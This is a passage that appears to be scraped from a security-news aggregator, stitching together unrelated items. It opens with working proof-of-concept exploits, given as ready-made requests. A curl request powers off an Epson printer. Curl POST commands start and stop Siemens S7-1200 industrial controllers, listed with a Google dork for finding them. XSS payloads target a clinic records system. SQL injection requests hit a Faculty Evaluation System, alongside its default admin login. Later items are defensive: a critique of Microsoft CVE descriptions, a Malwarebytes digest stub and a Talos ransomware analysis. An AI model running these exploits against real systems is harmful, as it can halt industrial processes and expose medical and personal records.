Epson Stylus SX510W suffers from a power off denial of service vulnerability.

    # Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)# Discovery by: Rafael Pedrero# Discovery Date: 2020-05-16# Vendor Homepage: https://www.epson.es/# Software Link :https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0# Tested on: Linux/Windows# Vulnerability Type: Denial of Service (DoS)1. DescriptionThe vulnerability occurs when 2 or more &'s are sent to the server in a row("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.2. Proof of ConceptRequest:curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"3. Solution:This version product is deprecated.-->

Epson Stylus SX510W Denial Of Service

Siemens SIMATIC S7-1200 CPU start/stop command cross site request forgery exploit. This older issue elaborates on t4rkd3vilz's CVE-2015-5698 by issuing a POST command to a specified web server path.

    # Exploit Title: Siemens SIMATIC S7-1200 CPU Start/Stop Command- Cross-Site Request Forgery# Google Dork: inurl:/Portal/Portal.mwsl# Date: 2022-03-24# Exploit Author: RoseSecurity# Vendor Homepage: https://www.siemens.com/global/en.html# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3# Tested on: Kali Linux# CVE: CVE-2015-5698# IP == PLC IP address# Start Commandcurl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'# Stop Commandcurl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'

Siemens SIMATIC S7-1200 Cross Site Request Forgery

Online Clinic Management System version 2.2 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)  
# Date: 27-06-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: https://bigprof.com  
# Software Download Link :  
https://bigprof.com/appgini/applications/online-clinic-management-system  
# Version : 2.2  
# Category: Webapps  
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits  
# CVE :  
# Category: webapps

# Vulnerability Type: Stored Cross-Site Scripting

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)  
vulnerability via the /clinic/medical_records_view.php, in FirstRecord  
parameter, GET and POST request.

2. Proof of Concept

GET:  
http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

POST:  
POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------1512016725878  
Content-Length: 1172  
Origin: https://127.0.0.1  
Connection: keep-alive  
Referer: https://127.0.0.1/clinic/medical_records_view.php  
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;  
online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1

-----------------------------1512016725878  
Content-Disposition: form-data; name="current_view"

DVP  
-----------------------------1512016725878  
Content-Disposition: form-data; name="SortField"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SelectedID"

1  
-----------------------------1512016725878  
Content-Disposition: form-data; name="SelectedField"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SortDirection"

-----------------------------1512016725878  
Content-Disposition: form-data; name="FirstRecord"

"><script>alert(1);</script>  
-----------------------------1512016725878  
Content-Disposition: form-data; name="NoDV"

-----------------------------1512016725878  
Content-Disposition: form-data; name="PrintDV"

-----------------------------1512016725878  
Content-Disposition: form-data; name="DisplayRecords"

all  
-----------------------------1512016725878  
Content-Disposition: form-data; name="patient"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SearchString"

-----------------------------1512016725878--

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)  
vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

And Reflected Cross-Site Scripting (XSS) too.  
# Vulnerability Type: Reflected Cross-Site Scripting

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)  
vulnerability via the /clinic/events_view.php, in FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)  
vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord  
parameter.

2. Proof of Concept

http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

Online Clinic Management System 2.2 Cross Site Scripting

A predictable patch cadence is nice, but the software giant can do more.

As the 20th anniversary of Patch Tuesday approaches later this year, many are reflecting on the importance of the program that brought predictability to Microsoft security patch cycles. Patch Tuesday undoubtedly improved the security of customers, and the success of the program is reflected in the number of organizations that established their own Patch Tuesdays, including Adobe, Siemens, Schneider Electric, and more.

However, the quality of the vulnerability details published by Microsoft on Patch Tuesday has noticeably declined. Vulnerability descriptions used to be useful. Now they are reduced to being nearly meaningless. Compare, for example, the CVE descriptions in the National Vulnerability Database (NVD) for CVE-2017-0290 and CVE-2023-21554 (aka QueueJumper):

_**CVE-2017-0290 NVD Vulnerability Description**_

_The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 does not properly scan a specially crafted file leading to memory corruption, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability."_

_**CVE-2023-21554 Vulnerability Description**_

_Microsoft Message Queuing Remote Code Execution Vulnerability_

The first description details the affected components (Forefront and Defender), the affected versions (various Windows operating systems), the attack vector (crafted file), and a bug class (memory corruption). The second description lacks almost all of those details.

This is not an isolated case. In fact, Microsoft's CVE descriptions have been on the decline for a number of years. The following graph maps the median length of Microsoft-created CVE descriptions over the past 20 years:

    

Source: Jacob Baines

**Impact on Defenders**

The poor descriptions have a serious impact on practitioners. It's difficult to prioritize vulnerabilities when it's unclear what the problems are. How is anyone supposed to know if Microsoft Message Queuing Remote Code Execution Vulnerability is a big deal or not? How many practitioners know what Microsoft Message Queuing is, or what major pieces of software use it? Is it enabled by default? Does it listen on a network port? The practitioner is forced to go looking for all this information themselves.

To avoid that type of thing, MITRE created well-defined rules for what is required in a CVE description. These are the minimum requirements:

_8.2.1 MUST provide enough information for a reader to have a reasonable understanding of what products are affected._

_8.2.3 MUST include one of the following:_

_1\. Vulnerability Type_

_2\. Root Cause_

_3\. Impact_

**Does Microsoft Message Queuing Remote Code Execution Vulnerability Satisfy These Requirements?**

Maybe a very loose interpretation of 8.2.3 would be satisfied with Code Execution Vulnerability. But can anyone reasonably say that "Microsoft Message Queuing" describes the affected products?

At least Microsoft included a specific service for CVE-2023-21554 (Message Queuing). It didn't even do that for CVE-2023-23415. That description doesn't list any software, and instead opts to list an affected protocol:

_**CVE-2023-23415 Vulnerability Description**_

_Internet Control Message Protocol (ICMP) Remote Code Execution Vulnerability_

**CWE Assigned to Microsoft CVE**

It's unclear why MITRE allows Microsoft to ignore (or, generously, skirt) the CVE description rules. What is clear is that everyone else is worse off because of it. If appealing to the overburdened practitioner isn't enough, we can actually measure the impact of Microsoft's bad CVE descriptions on NIST's per CVE common weakness enumeration (CWE) ID assignment.

For every CVE in NIST's NVD, it attempts to assign a CWE. When the vulnerability contains insufficient information to assign any specific CWE, then NIST assigns NVD-CWE-noinfo. Basically, "this CVE has insufficient details for us to know what the weakness is."

Back in 2015, NIST assigned NVD-CWE-noinfo to only a few Microsoft CVEs. In 2022, the majority of Microsoft CVEs received the NVD-CWE-noinfo designation.

    

Source: Jacob Baines

NIST's effort to assign CWE to each CVE helps with vulnerability prioritization and makes it easier to map vulnerabilities to CAPEC and/or MITRE ATT&CK. NVD CWE are used by a host of downstream projects, including MITRE's own CWE Top 25. Recent Microsoft vulnerabilities are largely excluded from these activities, because Microsoft has chosen to provide insufficient information to even assign a CWE to its vulnerabilities.

Unfortunately, it's not as if the information can be found in the Microsoft advisory itself, either. In fact, practitioners need to refer to outside sources, because Microsoft doesn't keep its advisories up to date. For example, both CVE-2022-41080 and CVE-2019-1388 were added to the Cybersecurity and Infrastructure Security Agency Known Exploited Vulnerabilities Catalog in 2023. Microsoft's NVD entries correctly reflect that. But both Microsoft advisories state that the vulnerabilities haven't been "exploited." That's because its advisories only reflect exploitation at the time of publication.

**Microsoft Advisory Exploitability Table for CVE-2019-1388**

    

The result is that Microsoft's advisory is both out of date and lacks information. The NVD entry is up to date, but also lacks information. Thankfully, there are a host of third parties trying to plug the information gap. For example, Zero Day Initiative publishes a rundown of every Patch Tuesday. This is its description of CVE-2023-21554 (aka QueueJumper):

_This is a CVSS 9.8 bug and receives Microsoft's highest exploitability rating. It allows a remote, unauthenticated attacker to run their code with elevated privileges on affected servers with the Message Queuing service enabled. This service is disabled by default but is commonly used by many contact center applications. It listens to TCP port 1801 by default, so blocking this at the perimeter would prevent external attacks. However, it's not clear what impact this may have on operations. Your best option is to test and deploy the update._

This description contains important information that the CVE entry does not, such as:

1\. Message Queuing is a service.

2\. Message Queuing is disabled by default.

3\. Message Queuing listens on TCP port 1801.

4\. Exploitation may result in elevated privileges.

All of that is incredibly useful for defenders — information that should have appeared in the CVE dictionary and the NVD entry, but doesn't. This is information that belongs in the CVE catalog for context, vulnerability prioritization, and historical safekeeping. Instead, already time-constrained defenders are put at a disadvantage because they're forced to go hunting for third-party descriptions of every Microsoft vulnerability.

**Conclusion

Microsoft's Patch Tuesday is almost old enough to drink, but that isn't reflected in the maturity of the program. A predictable patch cadence is nice, but the associated information produced by Microsoft is bad and has been trending that way for years. Microsoft can do much more, and it owes the community as much. Eight-word vulnerability descriptions should not and cannot be the norm.

**

Microsoft Advisories Are Getting Worse

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_subject.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_subject.php?id=

Vulnerability location: /eval/admin/manage\_subject.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_subject.php?id=2%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_subject.php?id\=2%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31844: bug_report/SQLi-3.md at main · acmglz/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/index.php?page=edit_faculty&id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/index.php?page=edit\_faculty&id=

Vulnerability location: /eval/index.php?page=edit\_faculty&id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/index.php?page=edit\_faculty&id=-1%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /eval/index.php?page\=edit\_faculty&id\=\-1%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31842: bug_report/SQLi-2.md at main · acmglz/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/view_faculty.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/view\_faculty.php?id=

Vulnerability location: /eval/admin/view\_faculty.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/view\_faculty.php?id=-1%20union%20select%201,2,3,4,database(),6,7,8,9--+ // Leak place ---> id

GET /eval/admin/view\_faculty.php?id\=\-1%20union%20select%201,2,3,4,database(),6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31843: bug_report/SQLi-1.md at main · acmglz/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_class.php?id=.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_class.php?id=

Vulnerability location: /eval/admin/manage\_class.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_class.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_class.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31845: bug_report/SQLi-4.md at main · acmglz/bug_report

Categories: News
Tags: YouTube

Tags:  ad block

Tags:  sponsored tweets

Tags:  Twitter

Tags:  fake BBC News

Tags:  AVLab assessment

Tags:  Google

Tags:  Google Passkey

Tags:  MSP

Tags:  Patch Tuesday

Tags:  Discord

Tags:  RedStinger

Tags:  tech support scam

Tags:  Aurora stealer

Tags:  Invalid Printer loader

Tags:  MSI

Tags:  ransomware

Tags:  Brightline

Tags:  ransomware review

Tags:  Allan Liska

Tags:  Lock and Code S04E11

The most interesting security related news of the week from May 8 till 14.



(Read more...)




The post A week in security (May 8-14) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (May 8-14)

Cisco Talos recently discovered a new ransomware actor called RA Group that has been operating since at least April 22, 2023.

Monday, May 15, 2023 08:05

*   Cisco Talos recently discovered a new ransomware actor called RA Group that has been operating since at least April 22, 2023.
*   The actor is swiftly expanding its operations. To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals.
*   Talos assesses with high confidence that RA Group is leveraging leaked Babuk ransomware source code.

**Who is the RA Group?**

Talos recently discovered a new ransomware actor, RA Group, who emerged in April 2023 and seems to be using leaked Babuk source code in its attacks. After an alleged member of the Babuk group leaked the full source code of its ransomware in September 2021, various ransomware families have emerged leveraging the leaked Babuk code. Talos has compiled a timeline of these attacks conducted by different actors using ransomware families that branched off the leaked source code.

Timeline of ransomware families leveraging leaked Babuk ransomware code.

The group is launching double extortion attacks. Like other ransomware actors, RA Group also operates a data leak site in which they threaten to publish the data exfiltrated from victims who fail to contact them within a specified time or do not meet their ransom demands. This form of double extortion increases the chances that a victim will pay the requested ransom.

22 April 2023

27 April 2023

RA Group leak site contents April 22 - 28, 2023.

This actor is expanding its operations at a fast pace. RA Group launched their data leak site on April 22, 2023, and on April 27, we observed the first batch of victims, three in total, followed by another one on April 28. We also observed the actor making cosmetic changes to their leak site after disclosing the victim’s details, confirming they are in the early stages of their operation.

Example of a post with victim details.

In their leak site, RA Group discloses the name of the victim's organization, a list of their exfiltrated data and the total size, and the victim’s official URL, which is typical among other ransomware groups’ leak sites. The RA Group is also selling the victim’s exfiltrated data on their leak site by hosting the victims’ leaked data on a secured Tor site.

RA Group’s victims’ data hosting site. 

RA Group also provides URLs to download the full file listings of the victim’s data on their leak site.

Example of full victim’s data file list for download. 

RA Group uses customized ransom notes, including the victim’s name and a unique link to download the exfiltration proofs. After activating the ransomware executable on the victim’s machine, the actor drops the ransom note file called “How To Restore Your Files.txt.”

Based on the ransom notes we analyzed, if the victim fails to contact the actors within three days, the group leaks the victim’s files. The victims can confirm the exfiltration of their information by downloading a file using the gofile\[.\]io link in the ransom note.

Sample of a ransom note.

**RA Group ransomware code appears highly customized**

RA Group deploys their ransomware with a built-in ransom note specifically written to each victim with their name on it, a common practice among ransomware groups. However, it is unusual that RA Group names the victim in the executable, as well.

Our analysis shows that RA Group’s ransomware sample is written in C++ and was compiled on April 23, 2023. The binary has the debug path “C:\\Users\\attack\\Desktop\\Ransomware.Multi.Babuk.c\\windows\\x64\\Release\\e.pdb”. It contains the same mutex name as the Babuk ransomware, supporting our high-confidence assessment that RA Group built their ransomware using Babuk’s leaked source code.

RA Group’s code showing the mutex name is the same as that of Babuk ransomware. 

RA Group’s ransomware executable uses the cryptography scheme with curve25519 and eSTREAM cipher hc-128 algorithm for encryption. This process encrypts only a certain part of the source file’s contents, not the entire file. It uses WinAPI CryptGenRandom to generate cryptographically random bytes used as a private key for each victim. After encrypting the files, the ransomware appends the file extension “.GAGUP” to the encrypted files on the victim’s machine.

The ransomware deletes the contents of the victim machine’s Recycle Bin with the API SHEmptyRecyclebinA. It deletes the volume shadow copy by executing the local Windows binary vssadmin.exe, an administrative tool used to manipulate shadow copies.

The function that deletes the volume shadow copies on the victim’s machine. 

The ransomware enumerates every logical drive on the victim’s machine by comparing logical drive letters with the list of drive letter strings in the binary and mounts the identified drives to perform the encryption process. RA Group’s malware enumerates the network shares and available network resources on the victim’s machine using the APIs NetShareEnum, WNetOpenEnumW and WNetEnumResourceW to encrypt files on the remotely mapped drives of other machines or servers.

The function enumerates the local drives and the network shares.

The ransomware does not encrypt all files and folders. The image below shows the hardcoded list of folders the malware won’t encrypt so the victim can contact the RA Group operators.

Hardcoded folders name to exclude during encryption. 

These files and folders are necessary for the system to work properly and to allow the victims to download the qTox application and contact RA group operators using the qTox ID provided on the ransom note.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 61761-61764 for Snort 2 and 300543-30054 for Snort 3.

ClamAV detections are available for this threat:

Win.Ransomware.Babuk-9819006-0

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

Tag

#windows